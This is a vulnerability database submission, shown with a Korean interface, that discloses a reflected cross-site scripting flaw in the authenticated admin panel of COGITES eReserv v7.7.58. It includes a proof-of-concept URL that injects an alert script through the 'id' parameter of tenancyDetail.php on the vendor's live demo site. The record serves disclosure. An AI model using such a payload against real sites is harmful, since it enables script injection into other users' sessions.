제출 #274372: COGITES eReserv v7.7.58 Reflected XSS (authenticated)정보

제목COGITES eReserv v7.7.58 Reflected XSS (authenticated)
설명You will have to authenticate to their demo online for the purpose of this PoC On admin panel (Authenticated): The "id=" parameter on tenancyDetail.php is vulnerable to reflected XSS. proof of concept: https://my.e-reserv.com/00000000ereservpro/front/admin/tenancyDetail.php?id=id=%22%3E%3Cscript%3Ealert(%27XSS%27)%3C/script%3E
사용자
 rubx (UID 62535)
제출2024. 01. 28. PM 05:57 (2 연령 ago)
모더레이션2024. 01. 29. PM 02:35 (21 hours later)
상태수락
VulDB 항목252303 [Cogites eReserv 7.7.58 tenancyDetail.php 아이디 크로스 사이트 스크립팅]
포인트들15

Do you want to use VulDB in your project?

Use the official API to access entries easily!